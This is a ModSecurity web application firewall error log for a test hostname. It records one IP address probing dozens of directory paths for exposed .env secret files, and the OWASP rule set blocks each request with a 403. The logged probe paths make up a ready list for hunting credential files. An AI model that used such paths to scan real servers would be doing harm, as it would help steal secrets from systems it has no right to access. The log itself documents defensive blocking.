[Tue Feb 03 13:09:22.031637 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aYHlck7r6RwSjQkPjN4W6AAAAAE"]
[Tue Feb 03 13:09:22.270495 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aYHlck7r6RwSjQkPjN4W7QAAAAE"]
[Tue Feb 03 13:09:22.270725 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aYHlck7r6RwSjQkPjN4W7QAAAAE"]
[Tue Feb 03 13:09:22.270911 2026] [:error] [pid 1833924] [client 195.178.110.33:47986] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aYHlck7r6RwSjQkPjN4W7QAAAAE"]
[Tue Feb 03 13:09:22.387134 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXiwAAAAc"]
[Tue Feb 03 13:09:22.387399 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXiwAAAAc"]
[Tue Feb 03 13:09:22.387587 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXiwAAAAc"]
[Tue Feb 03 13:09:22.410115 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjAAAAAc"]
[Tue Feb 03 13:09:22.410326 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjAAAAAc"]
[Tue Feb 03 13:09:22.410511 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjAAAAAc"]
[Tue Feb 03 13:09:22.453240 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjQAAAAc"]
[Tue Feb 03 13:09:22.453471 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjQAAAAc"]
[Tue Feb 03 13:09:22.453638 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/core/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjQAAAAc"]
[Tue Feb 03 13:09:22.486363 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjgAAAAc"]
[Tue Feb 03 13:09:22.486578 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjgAAAAc"]
[Tue Feb 03 13:09:22.486746 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjgAAAAc"]
[Tue Feb 03 13:09:22.518203 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjwAAAAc"]
[Tue Feb 03 13:09:22.518464 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjwAAAAc"]
[Tue Feb 03 13:09:22.518646 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXjwAAAAc"]
[Tue Feb 03 13:09:22.551244 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkAAAAAc"]
[Tue Feb 03 13:09:22.551466 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkAAAAAc"]
[Tue Feb 03 13:09:22.551631 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkAAAAAc"]
[Tue Feb 03 13:09:22.594871 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkQAAAAc"]
[Tue Feb 03 13:09:22.595082 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkQAAAAc"]
[Tue Feb 03 13:09:22.595277 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkQAAAAc"]
[Tue Feb 03 13:09:22.634105 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkgAAAAc"]
[Tue Feb 03 13:09:22.634308 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkgAAAAc"]
[Tue Feb 03 13:09:22.634522 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkgAAAAc"]
[Tue Feb 03 13:09:22.667250 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkwAAAAc"]
[Tue Feb 03 13:09:22.667469 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkwAAAAc"]
[Tue Feb 03 13:09:22.667641 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXkwAAAAc"]
[Tue Feb 03 13:09:22.701060 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlAAAAAc"]
[Tue Feb 03 13:09:22.701247 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlAAAAAc"]
[Tue Feb 03 13:09:22.701403 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlAAAAAc"]
[Tue Feb 03 13:09:22.730863 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlQAAAAc"]
[Tue Feb 03 13:09:22.731059 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlQAAAAc"]
[Tue Feb 03 13:09:22.731275 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlQAAAAc"]
[Tue Feb 03 13:09:22.761376 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlgAAAAc"]
[Tue Feb 03 13:09:22.761562 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlgAAAAc"]
[Tue Feb 03 13:09:22.761717 2026] [:error] [pid 1843379] [client 195.178.110.33:53492] [client 195.178.110.33] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aYHlcsjmlDJOeCd6_UCXlgAAAAc"]
